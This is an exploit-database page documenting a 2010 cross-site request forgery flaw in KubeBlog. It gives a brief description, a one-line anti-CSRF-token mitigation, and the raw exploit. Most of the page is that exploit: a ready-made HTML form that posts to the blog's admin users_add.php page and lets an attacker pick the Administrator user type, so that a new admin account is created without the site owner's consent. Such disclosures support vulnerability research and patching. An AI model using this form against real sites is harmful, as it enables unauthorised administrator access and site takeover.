header-logo
Suggest Exploit
vendor:
KubeBlog
by:
The.Morpheus
8,8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: KubeBlog
Affected Version From: KubeBlog 2008
Affected Version To: KubeBlog 2008
Patch Exists: NO
Related CWE: N/A
CPE: a:kubelabs:kubeblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

KubeBlog XSRF Vuln.

The KubeBlog application is vulnerable to Cross-Site Request Forgery (XSRF) attacks. An attacker can craft a malicious HTML form and submit it to the vulnerable application, which will add a new user with administrator privileges. This can be done without the user's knowledge or consent.

Mitigation:

The application should implement anti-CSRF tokens to verify that the request is coming from a trusted source.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : KubeBlog XSRF Vuln.
| # Author   : The.Morpheus
| # email    : fats0L@windowslive.com
| # Home     : http://www.spyturks.com
| # Date     : 03.05.2010
| # Script   : Copyright © 2008 Kubelabs.com  All Rights Reserved
| # Tested on: http://demos.kubelabs.com/kubeblog
| # Bug      : Yeni User Eklenebilinir.
======================      Exploit By The.Morpheus  =================================
 # Exploit  :

 <form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
        <table width="70%" cellpadding="0" cellspacing="2" border="0">
          <tr>
            <td width="35%"> </td>
            <td width="65%"> </td>

          </tr>
          <tr>
            <td><strong>Username (<a href="#" onClick="MM_openBrWindow('help.php?id=6','help','width=500,height=200')">?</a>)</strong></td>
            <td>:<input name="username" type="Text" class="textbox" id="username" style="width:60%" value=""><span class="error"></span></td>
          </tr>
          <tr>
            <td><strong>Password (<a href="#" onClick="MM_openBrWindow('help.php?id=7','help','width=500,height=200')">?</a>)</strong></td>

            <td>:<input name="password" type="password" class="textbox" id="password" style="width:60%" value=""><span class="error"></span></td>
          </tr>
          <tr>
            <td><strong>Confirm Password (<a href="#" onClick="MM_openBrWindow('help.php?id=8','help','width=500,height=200')">?</a>)</strong></td>
            <td>:<input name="password2" type="password" class="textbox" id="password2" style="width:60%" value=""></td>
          </tr>

          <tr>
            <td><strong>User Type (<a href="#" onClick="MM_openBrWindow('help.php?id=9','help','width=500,height=200')">?</a>)</strong></td>
            <td>:
            <select name="user_type">
            <option value='2'>User</option><option value='3'>Administrator</option><option value='4'>Moderator</option>            </select>
            </td>

          </tr>
          <tr>
            <td> </td>
            <td> </td>
          </tr>
          <tr>
            <td></td>
            <td height="30" style="padding-left:6px;">
            <input name="Submit" type="submit" class="button" value="Submit">

             
            <input name="Reset" type="reset" class="button" value="Reset">
            </td>
          </tr>
        </table>
    </form></td>


############################################################################################

Navigation

Suggest Exploit

Services By CQR